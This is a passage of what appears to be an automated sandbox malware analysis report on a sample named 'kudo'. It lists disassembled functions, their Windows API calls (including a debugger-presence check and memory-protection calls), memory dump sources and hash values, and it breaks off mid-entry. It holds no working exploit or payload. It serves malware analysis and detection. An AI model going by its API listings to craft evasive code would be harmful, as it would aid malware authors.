                                                      • Instruction Fuzzy Hash: 8BE012B160261597DB24A57CB941A9313DCEF5C3527150A1DB50DD7186CE64F8928174
                                                      Function 0080A9C3 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: CALL
                                                      • API String ID: 0-4196123274
                                                      • Opcode ID: 780b8bcd6d6351b75b762baf2cf70074140ab74a7f9fcfa30bf1d9b47ec7bd32
                                                      • Instruction ID: 4c5eff920df935d5ec0d0443489168535852499534442f4637d262277a8d29d7
                                                      • Opcode Fuzzy Hash: 780b8bcd6d6351b75b762baf2cf70074140ab74a7f9fcfa30bf1d9b47ec7bd32
                                                      • Instruction Fuzzy Hash: 8E225774508305DFD768DF18C890A6ABBE1FF84314F15896DE98ACB2A2D731EC45CB82
                                                      Function 00804C70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memmove
                                                      • String ID: EA06
                                                      • API String ID: 4104443479-3962188686
                                                      • Opcode ID: e6e263d036aaacb54aaae30eb24feb8dd4705638478eeff16f5644d1202479d4
                                                      • Instruction ID: 64ed0c77967976b4892d97c2404113b8cb7b4e23a92ab6322e3be294c7b7ba68
                                                      • Opcode Fuzzy Hash: e6e263d036aaacb54aaae30eb24feb8dd4705638478eeff16f5644d1202479d4
                                                      • Instruction Fuzzy Hash: 0F419CE1A8025C6BDF618B58CC517BE7FA1FF42304F286474EE82DB2C2D6349D4083A2
                                                      Function 00A3E148 Relevance: 3.2, APIs: 2, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SHGetFolderPathW.SHELL32(00000000,0000001C,00000000,00000000,?,?,00000208), ref: 00A3E25D
                                                        • Part of subcall function 00A3D9B8: GetFileAttributesW.KERNEL32(?), ref: 00A3D9C3
                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00A3E2B6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457539916.0000000000A3D000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_a3d000_kudo.jbxd
                                                      Similarity
                                                      • API ID: AttributesCreateDirectoryFileFolderPath
                                                      • String ID:
                                                      • API String ID: 1991693529-0
                                                      • Opcode ID: a3b6a8a6679e218569cdf7ec21d574e2a71d3681db11f0c994629a20e293bd28
                                                      • Instruction ID: 12fd329cc593bdbc6bd7c3dc807a3dbc5d68d0869366c28dd2ee98c046f7b2fe
                                                      • Opcode Fuzzy Hash: a3b6a8a6679e218569cdf7ec21d574e2a71d3681db11f0c994629a20e293bd28
                                                      • Instruction Fuzzy Hash: 82614F31A1420896EF14DFA0D854BEF733AEF58700F00556DF60DEB2D0EA759A85C7A5
                                                      Function 008047D0 Relevance: 3.1, APIs: 2, Instructions: 59COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • 73666F36.UXTHEME ref: 00804834
                                                        • Part of subcall function 0082336C: __lock.LIBCMT ref: 00823372
                                                        • Part of subcall function 0082336C: RtlDecodePointer.NTDLL(00000001), ref: 0082337E
                                                        • Part of subcall function 0082336C: RtlEncodePointer.NTDLL(?), ref: 00823389
                                                        • Part of subcall function 008048FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00804915
                                                        • Part of subcall function 008048FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0080492A
                                                        • Part of subcall function 00803B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00803B68
                                                        • Part of subcall function 00803B3A: IsDebuggerPresent.KERNEL32 ref: 00803B7A
                                                        • Part of subcall function 00803B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008C52F8,008C52E0,?,?), ref: 00803BEB
                                                        • Part of subcall function 00803B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00803C6F
                                                      • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00804874
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: InfoParametersSystem$CurrentDirectoryPointer$73666DebuggerDecodeEncodeFullNamePathPresent__lock
                                                      • String ID:
                                                      • API String ID: 1649018686-0
                                                      • Opcode ID: 41a69e7edaeca7beff5bf1a02788bcfc452791ed6501068901b2a8bfdd71962a
                                                      • Instruction ID: 4d6dc8ecc2359bbd7fb985a9ef95dd2371e1b4fcbb090c91f26035e478fc8bc5
                                                      • Opcode Fuzzy Hash: 41a69e7edaeca7beff5bf1a02788bcfc452791ed6501068901b2a8bfdd71962a
                                                      • Instruction Fuzzy Hash: 74118E719043459BCB00EF28EC0590ABBF8FB94750F10892EF480C32B2DB709A49CB96
                                                      Function 00805C99 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00805CC7
                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 0083DD73
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CreateFile
                                                      • String ID:
                                                      • API String ID: 823142352-0
                                                      • Opcode ID: c0dfda6a3bac0c8cbdd61f6b964f419fd94baf8fb1821a8a2b9295c1db9154cb
                                                      • Instruction ID: ab5a7c041382a52a819b3e26346801798f508ec7115b8418172068604466ed1a
                                                      • Opcode Fuzzy Hash: c0dfda6a3bac0c8cbdd61f6b964f419fd94baf8fb1821a8a2b9295c1db9154cb
                                                      • Instruction Fuzzy Hash: 4E016D70244708BEF2611E28CC8AF663A9CFB01768F108319BAE59A1E1C6B41C448F60
                                                      Function 008255FD Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __lock_file_memset
                                                      • String ID:
                                                      • API String ID: 26237723-0
                                                      • Opcode ID: d8e51220039271e28a31830b12300b600ed264e50c91e3a89fcf853e1cc88185
                                                      • Instruction ID: 2f587354009fd6a86597dd8775a7d9b8eb21875c83af06fa72df5da6b6973483
                                                      • Opcode Fuzzy Hash: d8e51220039271e28a31830b12300b600ed264e50c91e3a89fcf853e1cc88185
                                                      • Instruction Fuzzy Hash: 5E01D471841A28EBCF22AF6CFC0249E7B61FF60321F404115B824DA291DB318AD1DF92
                                                      Function 008253A6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00828B28: __getptd_noexit.LIBCMT ref: 00828B28
                                                      • __lock_file.LIBCMT ref: 008253EB
                                                        • Part of subcall function 00826C11: __lock.LIBCMT ref: 00826C34
                                                      • __fclose_nolock.LIBCMT ref: 008253F6
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                      • String ID:
                                                      • API String ID: 2800547568-0
                                                      • Opcode ID: 3bf0983281281d552c35199543c9fff8153c642634289b77d306591568f5cfcb
                                                      • Instruction ID: 301afc50ae58fe0f4ea7fd90ebb5f5660d0cbab0d1be4bad3c2f68e1c7272ab4
                                                      • Opcode Fuzzy Hash: 3bf0983281281d552c35199543c9fff8153c642634289b77d306591568f5cfcb
                                                      • Instruction Fuzzy Hash: C3F09671842A24DADB10BB69B8057AD6AE0FF42374F209149E424EB2C1CBBC49C15B53
                                                      Function 00829E2B Relevance: 3.0, APIs: 2, Instructions: 18COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • InitializeCriticalSectionEx.KERNEL32(00000000,008BE6A8,00829A0E,?,00829D0B,00000000,00000FA0,00000000,008BA1A8,00000008,00829C22,00000000,00000000,?,00829A7C,0000000D), ref: 00829E44
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000000,008BE6A8,?,00829D0B,00000000,00000FA0,00000000,008BA1A8,00000008,00829C22,00000000,00000000,?,00829A7C,0000000D), ref: 00829E4E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalInitializeSection$CountSpin
                                                      • String ID:
                                                      • API String ID: 4156364057-0
                                                      • Opcode ID: 63ded00b99628c2d4a3f396ad559c5fbbf225cca08732e3bff3cc5eb7b2b332b
                                                      • Instruction ID: 221d09f306ae0280f13d5532de9159381b31e69d5149a6a2fdb7aed2b83f7c14
                                                      • Opcode Fuzzy Hash: 63ded00b99628c2d4a3f396ad559c5fbbf225cca08732e3bff3cc5eb7b2b332b
                                                      • Instruction Fuzzy Hash: 2AD0673605424CBFCF029F98EC048993BBAFB58615F458421F96D89130D772A5A1AB40
                                                      Function 0080F290 Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8831a72de8d86e41362633fc93cb0f07fe20a570ad95bae48ed2698f5f64e9e9
                                                      • Instruction ID: 6926c410cc3c0290cbb2704d5992501013c5b7475d6d667b940c489e560e6b5a
                                                      • Opcode Fuzzy Hash: 8831a72de8d86e41362633fc93cb0f07fe20a570ad95bae48ed2698f5f64e9e9
                                                      • Instruction Fuzzy Hash: 2261A9B060060A9FCB60DF64C881AABB7E9FF04314F158479EA0ADB782D775ED40CB91
                                                      Function 00811FC3 Relevance: 1.7, APIs: 1, Instructions: 171COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d8980c89b4091832904d95fbd586e0128ec5264ac28510123c70b5d83d086d1f
                                                      • Instruction ID: 57d72ccc553e32830d02d74c94eb91ffa9eb3299a8eb753917e970fb55616878
                                                      • Opcode Fuzzy Hash: d8980c89b4091832904d95fbd586e0128ec5264ac28510123c70b5d83d086d1f
                                                      • Instruction Fuzzy Hash: 43518034600608AFCF14EB68CD91EAE77A6FF49314F158168F906EB392DA30ED50CB52
                                                      Function 00805AEE Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000), ref: 00805B96
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: FilePointer
                                                      • String ID:
                                                      • API String ID: 973152223-0
                                                      • Opcode ID: d0dd885ad862f64dc8ef7584e54264151b3fcf8cc7fdafb34434c2ac246c392b
                                                      • Instruction ID: 249fb9b3c8880597e23f5678499f20b78a2de945c3e4dc02ddd26385fd62f25f
                                                      • Opcode Fuzzy Hash: d0dd885ad862f64dc8ef7584e54264151b3fcf8cc7fdafb34434c2ac246c392b
                                                      • Instruction Fuzzy Hash: 9B313C31A00A09AFDB58DF6CC894A6EB7B5FF44320F148669D815D3750D770B990CFA1
                                                      Function 00820C08 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ProtectVirtual
                                                      • String ID:
                                                      • API String ID: 544645111-0
                                                      • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction ID: 537056d3ac10abb3d3186e3b3e5fd98cf57d0ce1dc88f04c4f4573ea4c3c194f
                                                      • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                      • Instruction Fuzzy Hash: 3131B2B0A001199BC718DF58E484A69FBA6FB59304B6487A5E80ACB356D731EEC1DFC0
                                                      Function 0083FCAC Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClearVariant
                                                      • String ID:
                                                      • API String ID: 1473721057-0
                                                      • Opcode ID: de558d64cadc12eb9668d530c187ba634ca9b8faf2f7e588be50808dacb973f2
                                                      • Instruction ID: 259339cb77e7a194745a6cb3d98b6f0c023eeabb034aac946c9077704bae0893
                                                      • Opcode Fuzzy Hash: de558d64cadc12eb9668d530c187ba634ca9b8faf2f7e588be50808dacb973f2
                                                      • Instruction Fuzzy Hash: 034108745043519FDB54DF18C848B1ABBE0FF45318F0988ACE9998B362C731E885CF92
                                                      Function 008206FD Relevance: 1.6, APIs: 1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: aa6fb75bfa27ba871a899fb4bbbd618bfc57508f8ddd74478bb5295b2ddcb0dd
                                                      • Instruction ID: 7b3249fcdaad12a78d83b400b03332e5eda8476345d7b6611a36ad28c7a6ad5b
                                                      • Opcode Fuzzy Hash: aa6fb75bfa27ba871a899fb4bbbd618bfc57508f8ddd74478bb5295b2ddcb0dd
                                                      • Instruction Fuzzy Hash: AF216D314097519FD7225B78BC01AE77BA4EF43320B0647A6FCA48B4E2E3251E61DAA1
                                                      Function 008059B9 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
